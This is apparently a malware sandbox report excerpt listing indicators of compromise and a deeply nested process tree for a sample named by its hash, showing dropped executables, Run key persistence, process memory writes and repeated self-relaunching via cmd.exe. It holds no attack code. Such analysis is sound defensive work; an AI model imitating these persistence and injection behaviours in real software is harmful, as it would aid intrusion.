5012	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
644	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
644	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
644	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
644	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
2372	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
2372	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
2372	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
2372	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
1824	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
1824	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
1824	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
1824	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
988	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
988	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
988	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
988	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
1564	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
1564	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
1564	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
1564	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
1140	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
1140	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
1140	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
1140	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
5084	aQksIwQY.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe
5084	aQksIwQY.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3672 wrote to memory of 4852	3672	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe	83
PID 3672 wrote to memory of 4852	3672	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe	83
PID 3672 wrote to memory of 4852	3672	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe	83
PID 3672 wrote to memory of 5084	3672	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe	84
PID 3672 wrote to memory of 5084	3672	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe	84
PID 3672 wrote to memory of 5084	3672	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe	84
PID 3672 wrote to memory of 3128	3672	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe	85
PID 3672 wrote to memory of 3128	3672	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe	85
PID 3672 wrote to memory of 3128	3672	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe	85
PID 3128 wrote to memory of 4652	3128	cmd.exe	87
PID 3128 wrote to memory of 4652	3128	cmd.exe	87
PID 3128 wrote to memory of 4652	3128	cmd.exe	87
PID 3672 wrote to memory of 2288	3672	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe	88
PID 3672 wrote to memory of 2288	3672	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe	88
PID 3672 wrote to memory of 2288	3672	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe	88
PID 3672 wrote to memory of 3428	3672	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe	89
PID 3672 wrote to memory of 3428	3672	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe	89
PID 3672 wrote to memory of 3428	3672	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe	89
PID 3672 wrote to memory of 2752	3672	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe	90
PID 3672 wrote to memory of 2752	3672	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe	90
PID 3672 wrote to memory of 2752	3672	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe	90
PID 3672 wrote to memory of 2672	3672	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe	91
PID 3672 wrote to memory of 2672	3672	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe	91
PID 3672 wrote to memory of 2672	3672	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe	91
PID 2672 wrote to memory of 2156	2672	cmd.exe	97
PID 2672 wrote to memory of 2156	2672	cmd.exe	97
PID 2672 wrote to memory of 2156	2672	cmd.exe	97
PID 4652 wrote to memory of 3856	4652	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe	98
PID 4652 wrote to memory of 3856	4652	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe	98
PID 4652 wrote to memory of 3856	4652	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe	98
PID 3856 wrote to memory of 2564	3856	cmd.exe	100
PID 3856 wrote to memory of 2564	3856	cmd.exe	100
PID 3856 wrote to memory of 2564	3856	cmd.exe	100
PID 4652 wrote to memory of 368	4652	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe	101
PID 4652 wrote to memory of 368	4652	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe	101
PID 4652 wrote to memory of 368	4652	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe	101
PID 4652 wrote to memory of 2608	4652	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe	102
PID 4652 wrote to memory of 2608	4652	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe	102
PID 4652 wrote to memory of 2608	4652	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe	102
PID 4652 wrote to memory of 988	4652	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe	103
PID 4652 wrote to memory of 988	4652	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe	103
PID 4652 wrote to memory of 988	4652	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe	103
PID 4652 wrote to memory of 4336	4652	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe	104
PID 4652 wrote to memory of 4336	4652	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe	104
PID 4652 wrote to memory of 4336	4652	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe	104
PID 4336 wrote to memory of 3996	4336	cmd.exe	109
PID 4336 wrote to memory of 3996	4336	cmd.exe	109
PID 4336 wrote to memory of 3996	4336	cmd.exe	109
PID 2564 wrote to memory of 4176	2564	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe	110
PID 2564 wrote to memory of 4176	2564	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe	110
PID 2564 wrote to memory of 4176	2564	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe	110
PID 4176 wrote to memory of 892	4176	cmd.exe	112
PID 4176 wrote to memory of 892	4176	cmd.exe	112
PID 4176 wrote to memory of 892	4176	cmd.exe	112
PID 2564 wrote to memory of 4400	2564	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe	113
PID 2564 wrote to memory of 4400	2564	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe	113
PID 2564 wrote to memory of 4400	2564	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe	113
PID 2564 wrote to memory of 2740	2564	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe	114
PID 2564 wrote to memory of 2740	2564	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe	114
PID 2564 wrote to memory of 2740	2564	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe	114
PID 2564 wrote to memory of 2436	2564	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe	115
PID 2564 wrote to memory of 2436	2564	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe	115
PID 2564 wrote to memory of 2436	2564	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe	115
PID 2564 wrote to memory of 2208	2564	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe	116

C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
"C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe"
1⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3672
- C:\Users\Admin\FwwcwswQ\CSkEQQUI.exe
  "C:\Users\Admin\FwwcwswQ\CSkEQQUI.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:4852
- C:\ProgramData\BuwEMkMQ\aQksIwQY.exe
  "C:\ProgramData\BuwEMkMQ\aQksIwQY.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops file in System32 directory
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of FindShellTrayWindow
  PID:5084
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3128
- - C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
    C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:4652
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3856
    - - C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:2564
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4176
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:892
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        8⤵
        
        PID:1192
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        9⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:556
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        10⤵
        
        PID:2044
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        11⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2892
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        12⤵
        
        PID:4740
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        13⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4156
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        14⤵
        
        PID:2932
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        15⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1556
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        16⤵
        
        PID:532
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        17⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3092
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        18⤵
        
        PID:3212
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        19⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5012
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        20⤵
        
        PID:1892
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        21⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:644
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        22⤵
        
        PID:4992
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        23⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2372
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        24⤵
        
        PID:1872
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        25⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1824
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        26⤵
        
        PID:5116
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        27⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:988
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        28⤵
        
        PID:2932
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        29⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1564
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        30⤵
        
        PID:3748
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        31⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1140
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        32⤵
        
        PID:4240
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        33⤵
        
        PID:2860
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        34⤵
        
        PID:4996
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        35⤵
        
        PID:2992
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        36⤵
        
        PID:4272
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        37⤵
        
        PID:3680
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        38⤵
        
        PID:4116
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        39⤵
        
        PID:3240
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        40⤵
        
        PID:3532
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        41⤵
        
        PID:4412
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        42⤵
        
        PID:1084
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        43⤵
        
        PID:5080
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        44⤵
        
        PID:2124
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        45⤵
        
        PID:4464
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        46⤵
        
        PID:1640
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        47⤵
        
        PID:1616
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        48⤵
        
        PID:3232
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        49⤵
        
        PID:4996
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        50⤵
        
        PID:3824
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        51⤵
        
        PID:4272
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        52⤵
        
        PID:3988
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        53⤵
        
        PID:1560
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        54⤵
        
        PID:3788
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        55⤵
        
        PID:436
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        56⤵
        
        PID:2252
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        57⤵
        
        PID:3628
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        58⤵
        
        PID:3160
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        59⤵
        
        PID:2460
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        60⤵
        
        PID:1992
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
